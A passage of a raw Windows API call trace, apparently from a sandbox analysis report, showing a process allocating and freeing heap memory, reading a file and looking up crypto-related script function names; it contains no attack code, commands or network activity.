[0185.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0185.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0185.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.462] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0185.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0185.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0185.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0185.462] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0185.463] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0185.463] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0185.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0185.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0185.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0185.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0185.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0185.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0185.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0185.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0185.464] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0185.464] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x7f10, lpOverlapped=0x0) returned 1 [0185.525] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0185.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0185.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0185.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7f10) returned 0xbea018 [0185.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0185.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0185.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0185.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0185.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0185.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7f10) returned 0xbf1f30 [0185.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0185.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.527] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0185.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0185.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0185.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7f10) returned 0xbea018 [0185.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0185.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0185.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0185.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.527] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0185.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0185.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0185.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0185.528] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.528] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0185.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0185.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7f10) returned 0xbea018 [0185.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0185.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0185.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0185.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0185.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0185.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0185.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0185.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0185.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0185.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0185.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0185.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0185.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7f10) returned 0xbf9e48 [0185.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0185.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0185.530] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0185.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0185.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0185.530] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0185.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0185.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0185.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0185.531] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0185.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0185.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2798 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0185.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0185.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0185.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0185.532] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0185.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0185.532] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0185.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0185.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0185.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0185.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0185.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0185.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0185.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0185.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0185.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0185.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0185.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0185.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0185.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0185.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0185.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0185.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.533] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0185.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0185.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0185.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0185.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0185.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0185.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0185.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0185.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0185.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0185.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0185.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0185.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0185.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0185.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0185.534] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0185.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0185.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0185.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0185.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0185.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0185.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0185.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0185.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.535] 